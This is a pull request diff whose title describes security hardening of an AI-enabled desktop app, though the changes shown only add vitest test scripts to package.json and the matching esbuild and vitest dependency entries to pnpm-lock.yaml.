### PR TITLE
security: harden AI tool deny-list, SSRF guard, terminal OSC trust, preview iframe sandbox, WSL distro validation

### DIFF
--- a/package.json
+++ b/package.json
@@ -7,7 +7,9 @@
     "dev": "vite",
     "build": "tsc && vite build",
     "preview": "vite preview",
-    "tauri": "tauri"
+    "tauri": "tauri",
+    "test": "vitest run",
+    "test:watch": "vitest"
   },
   "dependencies": {
     "@ai-sdk/anthropic": "^3.0.71",
@@ -95,6 +97,7 @@
     "@types/react-dom": "^19.1.6",
     "@vitejs/plugin-react": "^4.6.0",
     "typescript": "~5.8.3",
-    "vite": "^7.0.4"
+    "vite": "^7.0.4",
+    "vitest": "^2.1.9"
   }
 }

--- a/pnpm-lock.yaml
+++ b/pnpm-lock.yaml
@@ -261,6 +261,9 @@ importers:
       vite:
         specifier: ^7.0.4
         version: 7.3.2(@types/node@25.6.0)(jiti@2.6.1)(lightningcss@1.32.0)
+      vitest:
+        specifier: ^2.1.9
+        version: 2.1.9(@types/node@25.6.0)(lightningcss@1.32.0)(msw@2.13.4(@types/node@25.6.0)(typescript@5.8.3))
 
 packages:
 
@@ -577,16 +580,34 @@ packages:
     peerDependencies:
       '@noble/ciphers': ^1.0.0
 
+  '@esbuild/aix-ppc64@0.21.5':
+    resolution: {integrity: sha512-1SDgH6ZSPTlggy1yI6+Dbkiz8xzpHJEVAlF/AM1tHPLsf5STom9rwtjE4hKAF20FfXXNTFqEYXyJNWh1GiZedQ==}
+    engines: {node: '>=12'}
+    cpu: [ppc64]
+    os: [aix]
+
   '@esbuild/aix-ppc64@0.27.7':
     resolution: {integrity: sha512-EKX3Qwmhz1eMdEJokhALr0YiD0lhQNwDqkPYyPhiSwKrh7/4KRjQc04sZ8db+5DVVnZ1LmbNDI1uAMPEUBnQPg==}
     engines: {node: '>=18'}
     cpu: [ppc64]
     os: [aix]
 
+  '@esbuild/android-arm64@0.21.5':
+    resolution: {integrity: sha512-c0uX9VAUBQ7dTDCjq+wdyGLowMdtR/GoC2U5IYk/7D1H1JYC0qseD7+11iMP2mRLN9RcCMRcjC4YMclCzGwS/A==}
+    engines: {node: '>=12'}
+    cpu: [arm64]
+    os: [android]
+
   '@esbuild/android-arm64@0.27.7':
     resolution: {integrity: sha512-62dPZHpIXzvChfvfLJow3q5dDtiNMkwiRzPylSCfriLvZeq0a1bWChrGx/BbUbPwOrsWKMn8idSllklzBy+dgQ==}
     engines: {node: '>=18'}
     cpu: [arm64]
+    os: [android]
+
+  '@esbuild/android-arm@0.21.5':
+    resolution: {integrity: sha512-vCPvzSjpPHEi1siZdlvAlsPxXl7WbOVUBBAowWug4rJHb68Ox8KualB+1ocNvT5fjv6wpkX6o/iEpbDrf68zcg==}
+    engines: {node: '>=12'}
+    cpu: [arm]
     os: [android]
 
   '@esbuild/android-arm@0.27.7':
@@ -595,16 +616,34 @@ packages:
     cpu: [arm]
     os: [android]
 
+  '@esbuild/android-x64@0.21.5':
+    resolution: {integrity: sha512-D7aPRUUNHRBwHxzxRvp856rjUHRFW1SdQATKXH2hqA0kAZb1hKmi02OpYRacl0TxIGz/ZmXWlbZgjwWYaCakTA==}
+    engines: {node: '>=12'}
+    cpu: [x64]
+    os: [android]
+
   '@esbuild/android-x64@0.27.7':
     resolution: {integrity: sha512-x5VpMODneVDb70PYV2VQOmIUUiBtY3D3mPBG8NxVk5CogneYhkR7MmM3yR/uMdITLrC1ml/NV1rj4bMJuy9MCg==}
     engines: {node: '>=18'}
     cpu: [x64]
     os: [android]
 
+  '@esbuild/darwin-arm64@0.21.5':
+    resolution: {integrity: sha512-DwqXqZyuk5AiWWf3UfLiRDJ5EDd49zg6O9wclZ7kUMv2WRFr4HKjXp/5t8JZ11QbQfUS6/cRCKGwYhtNAY88kQ==}
+    engines: {node: '>=12'}
+    cpu: [arm64]
+    os: [darwin]
+
   '@esbuild/darwin-arm64@0.27.7':
     resolution: {integrity: sha512-5lckdqeuBPlKUwvoCXIgI2D9/ABmPq3Rdp7IfL70393YgaASt7tbju3Ac+ePVi3KDH6N2RqePfHnXkaDtY9fkw==}
     engines: {node: '>=18'}
     cpu: [arm64]
+    os: [darwin]
+
+  '@esbuild/darwin-x64@0.21.5':
+    resolution: {integrity: sha512-se/JjF8NlmKVG4kNIuyWMV/22ZaerB+qaSi5MdrXtd6R08kvs2qCN4C09miupktDitvh8jRFflwGFBQcxZRjbw==}
+    engines: {node: '>=12'}
+    cpu: [x64]
     os: [darwin]
 
   '@esbuild/darwin-x64@0.27.7':
@@ -613,10 +652,22 @@ packages:
     cpu: [x64]
     os: [darwin]
 
+  '@esbuild/freebsd-arm64@0.21.5':
+    resolution: {integrity: sha512-5JcRxxRDUJLX8JXp/wcBCy3pENnCgBR9bN6JsY4OmhfUtIHe3ZW0mawA7+RDAcMLrMIZaf03NlQiX9DGyB8h4g==}
+    engines: {node: '>=12'}
+    cpu: [arm64]
+    os: [freebsd]
+
   '@esbuild/freebsd-arm64@0.27.7':
     resolution: {integrity: sha512-B48PqeCsEgOtzME2GbNM2roU29AMTuOIN91dsMO30t+Ydis3z/3Ngoj5hhnsOSSwNzS+6JppqWsuhTp6E82l2w==}
     engines: {node: '>=18'}
     cpu: [arm64]
+    os: [freebsd]
+
+  '@esbuild/freebsd-x64@0.21.5':
+    resolution: {integrity: sha512-J95kNBj1zkbMXtHVH29bBriQygMXqoVQOQYA+ISs0/2l3T9/kj42ow2mpqerRBxDJnmkUDCaQT/dfNXWX/ZZCQ==}
+    engines: {node: '>=12'}
+    cpu: [x64]
     os: [freebsd]
 
   '@esbuild/freebsd-x64@0.27.7':
@@ -625,10 +676,22 @@ packages:
     cpu: [x64]
     os: [freebsd]
 
+  '@esbuild/linux-arm64@0.21.5':
+    resolution: {integrity: sha512-ibKvmyYzKsBeX8d8I7MH/TMfWDXBF3db4qM6sy+7re0YXya+K1cem3on9XgdT2EQGMu4hQyZhan7TeQ8XkGp4Q==}
+    engines: {node: '>=12'}
+    cpu: [arm64]
+    os: [linux]
+
   '@esbuild/linux-arm64@0.27.7':
     resolution: {integrity: sha512-RZPHBoxXuNnPQO9rvjh5jdkRmVizktkT7TCDkDmQ0W2SwHInKCAV95GRuvdSvA7w4VMwfCjUiPwDi0ZO6Nfe9A==}
     engines: {node: '>=18'}
     cpu: [arm64]
+    os: [linux]
+
+  '@esbuild/linux-arm@0.21.5':
+    resolution: {integrity: sha512-bPb5AHZtbeNGjCKVZ9UGqGwo8EUu4cLq68E95A53KlxAPRmUyYv2D6F0uUI65XisGOL1hBP5mTronbgo+0bFcA==}
+    engines: {node: '>=12'}
+    cpu: [arm]
     os: [linux]
 
   '@esbuild/linux-arm@0.27.7':
@@ -637,10 +700,22 @@ packages:
     cpu: [arm]
     os: [linux]
 
+  '@esbuild/linux-ia32@0.21.5':
+    resolution: {integrity: sha512-YvjXDqLRqPDl2dvRODYmmhz4rPeVKYvppfGYKSNGdyZkA01046pLWyRKKI3ax8fbJoK5QbxblURkwK/MWY18Tg==}
+    engines: {node: '>=12'}
+    cpu: [ia32]
+    os: [linux]
+
   '@esbuild/linux-ia32@0.27.7':
     resolution: {integrity: sha512-GA48aKNkyQDbd3KtkplYWT102C5sn/EZTY4XROkxONgruHPU72l+gW+FfF8tf2cFjeHaRbWpOYa/uRBz/Xq1Pg==}
     engines: {node: '>=18'}
     cpu: [ia32]
+    os: [linux]
+
+  '@esbuild/linux-loong64@0.21.5':
+    resolution: {integrity: sha512-uHf1BmMG8qEvzdrzAqg2SIG/02+4/DHB6a9Kbya0XDvwDEKCoC8ZRWI5JJvNdUjtciBGFQ5PuBlpEOXQj+JQSg==}
+    engines: {node: '>=12'}
+    cpu: [loong64]
     os: [linux]
 
   '@esbuild/linux-loong64@0.27.7':
@@ -649,10 +724,22 @@ packages:
     cpu: [loong64]
     os: [linux]
 
+  '@esbuild/linux-mips64el@0.21.5':
+    resolution: {integrity: sha512-IajOmO+KJK23bj52dFSNCMsz1QP1DqM6cwLUv3W1QwyxkyIWecfafnI555fvSGqEKwjMXVLokcV5ygHW5b3Jbg==}
+    engines: {node: '>=12'}
+    cpu: [mips64el]
+    os: [linux]
+
   '@esbuild/linux-mips64el@0.27.7':
     resolution: {integrity: sha512-KabT5I6StirGfIz0FMgl1I+R1H73Gp0ofL9A3nG3i/cYFJzKHhouBV5VWK1CSgKvVaG4q1RNpCTR2LuTVB3fIw==}
     engines: {node: '>=18'}
     cpu: [mips64el]
+    os: [linux]
+
+  '@esbuild/linux-ppc64@0.21.5':
+    resolution: {integrity: sha512-1hHV/Z4OEfMwpLO8rp7CvlhBDnjsC3CttJXIhBi+5Aj5r+MBvy4egg7wCbe//hSsT+RvDAG7s81tAvpL2XAE4w==}
+    engines: {node: '>=12'}
+    cpu: [ppc64]
     os: [linux]
 
   '@esbuild/linux-ppc64@0.27.7':
@@ -661,16 +748,34 @@ packages:
     cpu: [ppc64]
     os: [linux]
 
+  '@esbuild/linux-riscv64@0.21.5':
+    resolution: {integrity: sha512-2HdXDMd9GMgTGrPWnJzP2ALSokE/0O5HhTUvWIbD3YdjME8JwvSCnNGBnTThKGEB91OZhzrJ4qIIxk/SBmyDDA==}
+    engines: {node: '>=12'}
+    cpu: [riscv64]
+    os: [linux]
+
   '@esbuild/linux-riscv64@0.27.7':
     resolution: {integrity: sha512-hL25LbxO1QOngGzu2U5xeXtxXcW+/GvMN3ejANqXkxZ/opySAZMrc+9LY/WyjAan41unrR3YrmtTsUpwT66InQ==}
     engines: {node: '>=18'}
     cpu: [riscv64]
     os: [linux]
 
+  '@esbuild/linux-s390x@0.21.5':
+    resolution: {integrity: sha512-zus5sxzqBJD3eXxwvjN1yQkRepANgxE9lgOW2qLnmr8ikMTphkjgXu1HR01K4FJg8h1kEEDAqDcZQtbrRnB41A==}
+    engines: {node: '>=12'}
+    cpu: [s390x]
+    os: [linux]
+
   '@esbuild/linux-s390x@0.27.7':
     resolution: {integrity: sha512-2k8go8Ycu1Kb46vEelhu1vqEP+UeRVj2zY1pSuPdgvbd5ykAw82Lrro28vXUrRmzEsUV0NzCf54yARIK8r0fdw==}
     engines: {node: '>=18'}
     cpu: [s390x]
+    os: [linux]
+
+  '@esbuild/linux-x64@0.21.5':
+    resolution: {integrity: sha512-1rYdTpyv03iycF1+BhzrzQJCdOuAOtaqHTWJZCWvijKD2N5Xu0TtVC8/+1faWqcP9iBCWOmjmhoH94dH82BxPQ==}
+    engines: {node: '>=12'}
+    cpu: [x64]
     os: [linux]
 
   '@esbuild/linux-x64@0.27.7':
@@ -685,6 +790,12 @@ packages:
     cpu: [arm64]
     os: [netbsd]
 
+  '@esbuild/netbsd-x64@0.21.5':
+    resolution: {integrity: sha512-Woi2MXzXjMULccIwMnLciyZH4nCIMpWQAs049KEeMvOcNADVxo0UBIQPfSmxB3CWKedngg7sWZdLvLczpe0tLg==}
+    engines: {node: '>=12'}
+    cpu: [x64]
+    os: [netbsd]
+
   '@esbuild/netbsd-x64@0.27.7':
     resolution: {integrity: sha512-OfatkLojr6U+WN5EDYuoQhtM+1xco+/6FSzJJnuWiUw5eVcicbyK3dq5EeV/QHT1uy6GoDhGbFpprUiHUYggrw==}
     engines: {node: '>=18'}
@@ -695,6 +806,12 @@ packages:
     resolution: {integrity: sha512-AFuojMQTxAz75Fo8idVcqoQWEHIXFRbOc1TrVcFSgCZtQfSdc1RXgB3tjOn/krRHENUB4j00bfGjyl2mJrU37A==}
     engines: {node: '>=18'}
     cpu: [arm64]
+    os: [openbsd]
+
+  '@esbuild/openbsd-x64@0.21.5':
+    resolution: {integrity: sha512-HLNNw99xsvx12lFBUwoT8EVCsSvRNDVxNpjZ7bPn947b8gJPzeHWyNVhFsaerc0n3TsbOINvRP2byTZ5LKezow==}
+    engines: {node: '>=12'}
+    cpu: [x64]
     os: [openbsd]
 
   '@esbuild/openbsd-x64@0.27.7':
@@ -709,11 +826,23 @@ packages:
     cpu: [arm64]
     os: [openharmony]
 
+  '@esbuild/sunos-x64@0.21.5':
+    resolution: {integrity: sha512-6+gjmFpfy0BHU5Tpptkuh8+uw3mnrvgs+dSPQXQOv3ekbordwnzTVEb4qnIvQcYXq6gzkyTnoZ9dZG+D4garKg==}
+    engines: {node: '>=12'}
+    cpu: [x64]
+    os: [sunos]
+
   '@esbuild/sunos-x64@0.27.7':
     resolution: {integrity: sha512-ikktIhFBzQNt/QDyOL580ti9+5mL/YZeUPKU2ivGtGjdTYoqz6jObj6nOMfhASpS4GU4Q/Clh1QtxWAvcYKamA==}
     engines: {node: '>=18'}
     cpu: [x64]
     os: [sunos]
+
+  '@esbuild/win32-arm64@0.21.5':
+    resolution: {integrity: sha512-Z0gOTd75VvXqyq7nsl93zwahcTROgqvuAcYDUr+vOv8uHhNSKROyU961kgtCD1e95IqPKSQKH7tBTslnS3tA8A==}
+    engines: {node: '>=12'}
+    cpu: [arm64]
+    os: [win32]
 
   '@esbuild/win32-arm64@0.27.7':
     resolution: {integrity: sha512-7yRhbHvPqSpRUV7Q20VuDwbjW5kIMwTHpptuUzV+AA46kiPze5Z7qgt6CLCK3pWFrHeNfDd1VKgyP4O+ng17CA==}
@@ -721,10 +850,22 @@ packages:
     cpu: [arm64]
     os: [win32]
 
+  '@esbuild/win32-ia32@0.21.5':
+    resolution: {integrity: sha512-SWXFF1CL2RVNMaVs+BBClwtfZSvDgtL//G/smwAc5oVK/UPu2Gu9tIaRgFmYFFKrmg3SyAjSrElf0TiJ1v8fYA==}
+    engines: {node: '>=12'}
+    cpu: [ia32]
+    os: [win32]
+
   '@esbuild/win32-ia32@0.27.7':
     resolution: {integrity: sha512-SmwKXe6VHIyZYbBLJrhOoCJRB/Z1tckzmgTLfFYOfpMAx63BJEaL9ExI8x7v0oAO3Zh6D/Oi1gVxEYr5oUCFhw==}
     engines: {node: '>=18'}
     cpu: [ia32]
+    os: [win32]
+
+  '@esbuild/win32-x64@0.21.5':
+    resolution: {integrity: sha512-tQd/1efJuzPC6rCFwEvLtci/xNFcTZknmXs98FYDfGE4wP9ClFV98nyKrzJKVPMhdDnjzLhdUyMX4PsQAPjwIw==}
+    engines: {node: '>=12'}
+    cpu: [x64]
     os: [win32]
 
   '@esbuild/win32-x64@0.27.7':
@@ -2193,6 +2334,7 @@ packages:
 
   '@ungap/structured-clone@1.3.0':
     resolution: {integrity: sha512-WmoN8qaIAo7WTYWbAZuG8PYEhn5fkz7dZrqTBZ7dtt//lL2Gwms1IcnQ5yHqjDfX8Ft5j4YzDM23f87zBfDe9g==}
+    deprecated: Potential CWE-502 - Update to 1.3.1 or higher
 
   '@upsetjs/venn.js@2.0.0':
     resolution: {integrity: sha512-WbBhLrooyePuQ1VZxrJjtLvTc4NVfpOyKx0sKqioq9bX1C1m7Jgykkn8gLrtwumBioXIqam8DLxp88Adbue6Hw==}
@@ -2206,6 +2348,35 @@ packages:
     engines: {node: ^14.18.0 || >=16.0.0}
     peerDependencies:
       vite: ^4.2.0 || ^5.0.0 || ^6.0.0 || ^7.0.0
+
+  '@vitest/expect@2.1.9':
+    resolution: {integrity: sha512-UJCIkTBenHeKT1TTlKMJWy1laZewsRIzYighyYiJKZreqtdxSos/S1t+ktRMQWu2CKqaarrkeszJx1cgC5tGZw==}
+
+  '@vitest/mocker@2.1.9':
+    resolution: {integrity: sha512-tVL6uJgoUdi6icpxmdrn5YNo3g3Dxv+IHJBr0GXHaEdTcw3F+cPKnsXFhli6nO+f/6SDKPHEK1UN+k+TQv0Ehg==}
+    peerDependencies:
+      msw: ^2.4.9
+      vite: ^5.0.0
+    peerDependenciesMeta:
+      msw:
+        optional: true
+      vite:
+        optional: true
+
+  '@vitest/pretty-format@2.1.9':
+    resolution: {integrity: sha512-KhRIdGV2U9HOUzxfiHmY8IFHTdqtOhIzCpd8WRdJiE7D/HUcZVD0EgQCVjm+Q9gkUXWgBvMmTtZgIG48wq7sOQ==}
+
+  '@vitest/runner@2.1.9':
+    resolution: {integrity: sha512-ZXSSqTFIrzduD63btIfEyOmNcBmQvgOVsPNPe0jYtESiXkhd8u2erDLnMxmGrDCwHCCHE7hxwRDCT3pt0esT4g==}
+
+  '@vitest/snapshot@2.1.9':
+    resolution: {integrity: sha512-oBO82rEjsxLNJincVhLhaxxZdEtV0EFHMK5Kmx5sJ6H9L183dHECjiefOAdnqpIgT5eZwT04PoggUnW88vOBNQ==}
+
+  '@vitest/spy@2.1.9':
+    resolution: {integrity: sha512-E1B35FwzXXTs9FHNK6bDszs7mtydNi5MIfUWpceJ8Xbfb1gBMscAnwLbEu+B44ed6W3XjL9/ehLPHR1fkf1KLQ==}
+
+  '@vitest/utils@2.1.9':
+    resolution: {integrity: sha512-v0psaMSkNJ3A2NMrUEHFRzJtDPFn+/VWZ5WxImB21T9fjucJRmS7xCS3ppEnARb9y11OAzaD+P2Ps+b+BGX5iQ==}
 
   '@xterm/addon-fit@0.11.0':
     resolution: {integrity: sha512-jYcgT6xtVYhnhgxh3QgYDnnNMYTcf8ElbxxFzX0IZo+vabQqSPAjC3c1wJrKB5E19VwQei89QCiZZP86DCPF7g==}
@@ -2274,6 +2445,10 @@ packages:
     resolution: {integrity: sha512-ik3ZgC9dY/lYVVM++OISsaYDeg1tb0VtP5uL3ouh1koGOaUMDPpbFIei4JkFimWUFPn90sbMNMXQAIVOlnYKJA==}
     engines: {node: '>=10'}
 
+  assertion-error@2.0.1:
+    resolution: {integrity: sha512-Izi8RQcffqCeNVgFigKli1ssklIbpHnCYc6AknXGYoB6grJqyeby7jv12JUQgmTAnIDnbck1uxksT4dzN3PWBA==}
+    engines: {node: '>=12'}
+
   ast-types@0.16.1:
     resolution: {integrity: sha512-6t10qk83GOG8p0vKmaCr8eiilZwO171AvbROMtvvNiwrTly62t+7XkA8RdIIVbpMhCASAsxgAzdRSwh6nw/5Dg==}
     engines: {node: '>=4'}
@@ -2315,6 +2490,10 @@ packages:
     resolution: {integrity: sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==}
     engines: {node: '>= 0.8'}
 
+  cac@6.7.14:
+    resolution: {integrity: sha512-b6Ilus+c3RrdDk+JhLKUAQfzzgLEPy6wcXqS7f/xe1EETvsDP6GORG7SFuOs6cID5YkqchW/LXZbX5bc8j7ZcQ==}
+    engines: {node: '>=8'}
+
   call-bind-apply-helpers@1.0.2:
     resolution: {integrity: sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==}
     engines: {node: '>= 0.4'}
@@ -2333,6 +2512,10 @@ packages:
   ccount@2.0.1:
     resolution: {integrity: sha512-eyrF0jiFpY+3drT6383f1qhkbGsLSifNAjA61IUjZjmLCWjItY6LB9ft9YhoDgwfmclB2zhu51Lc7+95b8NRAg==}
 
+  chai@5.3.3:
+    resolution: {integrity: sha512-4zNhdJD/iOjSH0A05ea+Ke6MU5mmpQcbQsSOkgdaUMJ9zTlDTD/GYlwohmIE2u0gaxHYiVHEn1Fw9mZ/ktJWgw==}
+    engines: {node: '>=18'}
+
   chalk@5.6.2:
     resolution: {integrity: sha512-7NzBL0rN6fMUW+f7A6Io4h40qQlG+xGmtMxfbnH/K7TAtt8JQWVQK+6g0UXKMeVJoyV5EkkNsErQ8pVD3bLHbA==}
     engines: {node: ^12.17.0 || ^14.13 || >=16.0.0}
@@ -2348,6 +2531,10 @@ packages:
 
   character-reference-invalid@2.0.1:
     resolution: {integrity: sha512-iBZ4F4wRbyORVsu0jPV7gXkOsGYjGHPmAyv+HiHG8gi5PtC9KI2j1+v8/tlibRvjoWX027ypmG/n0HtO5t7unw==}
+
+  check-error@2.1.3:
+    resolution: {integrity: sha512-PAJdDJusoxnwm1VwW07VWwUN1sl7smmC3OKggvndJFadxxDRyFJBX/ggnu/KE4kQAB7a3Dp8f/YXC1FlUprWmA==}
+    engines: {node: '>= 16'}
 
   chevrotain-allstar@0.4.1:
     resolution: {integrity: sha512-PvVJm3oGqrveUVW2Vt/eZGeiAIsJszYweUcYwcskg9e+IubNYKKD+rHHem7A6XVO22eDAL+inxNIGAzZ/VIWlA==}
@@ -2662,6 +2849,10 @@ packages:
       babel-plugin-macros:
         optional: true
 
+  deep-eql@5.0.2:
+    resolution: {integrity: sha512-h5k/5U50IJJFpzfL6nO9jaaumfjO/f2NjK/oYB2Djzm4p9L+3T9qWpZqZ2hAbLPuuYq9wrU08WQyBTL5GbPk5Q==}
+    engines: {node: '>=6'}
+
   deepmerge@4.3.1:
     resolution: {integrity: sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==}
     engines: {node: '>=0.10.0'}
@@ -2757,9 +2948,17 @@ packages:
     resolution: {integrity: sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==}
     engines: {node: '>= 0.4'}
 
+  es-module-lexer@1.7.0:
+    resolution: {integrity: sha512-jEQoCwk8hyb2AZziIOLhDqpm5+2ww5uIE6lkO/6jcOCusfk6LhMHpXXfBLXTZ7Ydyt0j4VoUQv6uGNYbdW+kBA==}
+
   es-object-atoms@1.1.1:
     resolution: {integrity: sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==}
     engines: {node: '>= 0.4'}
+
+  esbuild@0.21.5:
+    resolution: {integrity: sha512-mg3OPMV4hXywwpoDxu3Qda5xCKQi+vCTZq8S9J/EpkhB2HzKXq4SNFZE3+NK93JYxc8VMSep+lOUSC/RVKaBqw==}
+    engines: {node: '>=12'}
+    hasBin: true
 
   esbuild@0.27.7:
     resolution: {integrity: sha512-IxpibTjyVnmrIQo5aqNpCgoACA/dTKLTlhMHihVHhdkxKyPO1uBBthumT0rdHmcsk9uMonIWS0m4FljWzILh3w==}
@@ -2785,6 +2984,9 @@ packages:
   estree-util-is-identifier-name@3.0.0:
     resolution: {integrity: sha512-hFtqIDZTIUZ9BXLb8y4pYGyk6+wekIivNVTcmvk8NoOh+VeRn5y6cEHzbURrWbfp1fIqdVipilzj+lfaadNZmg==}
 
+  estree-walker@3.0.3:
+    resolution: {integrity: sha512-7RUKfXgSMMkzt6ZuXmqapOurLGPPfgj6l9uRZ7lRGolvk0y2yocc35LdcxKC5PQZdn2DMqioAQ2NoWcrTKmm6g==}
+
   etag@1.8.1:
     resolution: {integrity: sha512-aIL5Fx7mawVa300al2BnEE4iNvo1qETxLrPI/o05L7z6go7fCw1J6EQmbK4FmJ2AS7kgVF/KEZWufBfdClMcPg==}
     engines: {node: '>= 0.6'}
@@ -2804,6 +3006,10 @@ packages:
   execa@9.6.1:
     resolution: {integrity: sha512-9Be3ZoN4LmYR90tUoVu2te2BsbzHfhJyfEiAVfz7N5/zv+jduIfLrV2xdQXOHbaD6KgpGdO9PRPM1Y4Q9QkPkA==}
     engines: {node: ^18.19.0 || >=20.5.0}
+
+  expect-type@1.3.0:
+    resolution: {integrity: sha512-knvyeauYhqjOYvQ66MznSMs83wmHrCycNEN6Ao+2AeYEfxUIkuiVxdEa1qlGEPK+We3n0THiDciYSsCcgW/DoA==}
+    engines: {node: '>=12.0.0'}
 
   express-rate-limit@8.3.2:
     resolution: {integrity: sha512-77VmFeJkO0/rvimEDuUC5H30oqUC4EyOhyGccfqoLebB0oiEYfM7nwPrsDsBL1gsTpwfzX8SFy2MT3TDyRq+bg==}
@@ -3303,6 +3509,9 @@ packages:
   longest-streak@3.1.0:
     resolution: {integrity: sha512-9Ri+o0JYgehTaVBBDoMqIl8GXtbWg711O3srftcHhZ0dqnETqLaoIK0x17fUw9rFSlK/0NlsKe0Ahhyl5pXE2g==}
 
+  loupe@3.2.1:
+    resolution: {integrity: sha512-CdzqowRJCeLU72bHvWqwRBBlLcMEtIvGrlvef74kMnV2AolS9Y8xUv1I0U/MNAWMhBlKIoyuEgoJ0t/bbwHbLQ==}
+
   lru-cache@5.1.1:
     resolution: {integrity: sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==}
 
@@ -3652,8 +3861,15 @@ packages:
   path-to-regexp@8.4.2:
     resolution: {integrity: sha512-qRcuIdP69NPm4qbACK+aDogI5CBDMi1jKe0ry5rSQJz8JVLsC7jV8XpiJjGRLLol3N+R5ihGYcrPLTno6pAdBA==}
 
+  pathe@1.1.2:
+    resolution: {integrity: sha512-whLdWMYL2TwI08hn8/ZqAbrVemu0LNaNNJZX73O6qaIdCTfXutsLhMkjdENX0qhsQ9uIimo4/aQOmXkoon2nDQ==}
+
   pathe@2.0.3:
     resolution: {integrity: sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==}
+
+  pathval@2.0.1:
+    resolution: {integrity: sha512-//nshmD55c46FuFw26xV/xFAaB5HF9Xdap7HJBBnrKdAd6/GxDBaNA1870O79+9ueg61cZLSVc+OaFlfmObYVQ==}
+    engines: {node: '>= 14.16'}
 
   picocolors@1.1.1:
     resolution: {integrity: sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==}
@@ -3911,6 +4127,9 @@ packages:
     resolution: {integrity: sha512-ZX99e6tRweoUXqR+VBrslhda51Nh5MTQwou5tnUDgbtyM0dBgmhEDtWGP/xbKn6hqfPRHujUNwz5fy/wbbhnpw==}
     engines: {node: '>= 0.4'}
 
+  siginfo@2.0.0:
+    resolution: {integrity: sha512-ybx0WO1/8bSBLEWXZvEd7gMW3Sn3JFlW3TvX1nREbDLRNQNaeNN8WK0meBwPdAaOI7TtRRRJn/Es1zhrrCHu7g==}
+
   signal-exit@3.0.7:
     resolution: {integrity: sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==}
 
@@ -3932,9 +4151,15 @@ packages:
   space-separated-tokens@2.0.2:
     resolution: {integrity: sha512-PEGlAwrG8yXGXRjW32fGbg66JAlOAwbObuqVoJpv/mRgoWDQfgH1wDPvtzWyUSNAXBGSk8h755YDbbcEy3SH2Q==}
 
+  stackback@0.0.2:
+    resolution: {integrity: sha512-1XMJE5fQo1jGH6Y/7ebnwPOBEkIEnT4QF32d5R1+VXdXveM0IBMJt8zfaxX1P3QhVwrYe+576+jkANtSS2mBbw==}
+
   statuses@2.0.2:
     resolution: {integrity: sha512-DvEy55V3DB7uknRo+4iOGT5fP1slR8wQohVdknigZPMpMstaKJQWhwiYBACJE3Ul2pTnATihhBYnRhZQHGBiRw==}
     engines: {node: '>= 0.8'}
+
+  std-env@3.10.0:
+    resolution: {integrity: sha512-5GS12FdOZNliM5mAOxFRg7Ir0pWz8MdpYm6AY6VPkGpbA7ZzmbzNcBJQ0GPvvyWgcY7QAhCgf9Uy89I03faLkg==}
 
   stdin-discarder@0.2.2:
     resolution: {integrity: sha512-UhDfHmA92YAlNnCfhmq0VeNL5bDbiZGg7sZ2IvPsXubGkiNa9EC+tUTsjBRsYUAz87btI6/1wf4XoVvQ3uRnmQ==}
@@ -4022,6 +4247,12 @@ packages:
   tiny-invariant@1.3.3:
     resolution: {integrity: sha512-+FbBPE1o9QAYvviau/qC5SE3caw21q3xkvWKBtja5vgqOWIHHJ3ioaq1VPfn/Szqctz2bU/oYeKd9/z5BL+PVg==}
 
+  tinybench@2.9.0:
+    resolution: {integrity: sha512-0+DUvqWMValLmha6lr4kD8iAMK1HzV0/aKnCtWb9v9641TnP/MFb7Pc2bxoxQjTXAErryXVgUOfv2YqNllqGeg==}
+
+  tinyexec@0.3.2:
+    resolution: {integrity: sha512-KQQR9yN7R5+OSwaK0XQoj22pwHoTlgYqmUscPYoknOoWCWfj/5/ABTMRi69FrKU5ffPVh5QcFikpWJI/P1ocHA==}
+
   tinyexec@1.1.1:
     resolution: {integrity: sha512-VKS/ZaQhhkKFMANmAOhhXVoIfBXblQxGX1myCQ2faQrfmobMftXeJPcZGp0gS07ocvGJWDLZGyOZDadDBqYIJg==}
     engines: {node: '>=18'}
@@ -4029,6 +4260,18 @@ packages:
   tinyglobby@0.2.16:
     resolution: {integrity: sha512-pn99VhoACYR8nFHhxqix+uvsbXineAasWm5ojXoN8xEwK5Kd3/TrhNn1wByuD52UxWRLy8pu+kRMniEi6Eq9Zg==}
     engines: {node: '>=12.0.0'}
+
+  tinypool@1.1.1:
+    resolution: {integrity: sha512-Zba82s87IFq9A9XmjiX5uZA/ARWDrB03OHlq+Vw1fSdt0I+4/Kutwy8BP4Y/y/aORMo61FQ0vIb5j44vSo5Pkg==}
+    engines: {node: ^18.0.0 || >=20.0.0}
+
+  tinyrainbow@1.2.0:
+    resolution: {integrity: sha512-weEDEq7Z5eTHPDh4xjX789+fHfF+P8boiFB+0vbWzpbnbsEr/GRaohi/uMKxg8RZMXnl1ItAi/IUHWMsjDV7kQ==}
+    engines: {node: '>=14.0.0'}
+
+  tinyspy@3.0.2:
+    resolution: {integrity: sha512-n1cw8k1k0x4pgA2+9XrOkFydTerNcJ1zWCO5Nn9scWHTD+5tp8dghT2x1uduQePZTZgd3Tupf+x9BxJjeJi77Q==}
+    engines: {node: '>=14.0.0'}
 
   tldts-core@7.0.28:
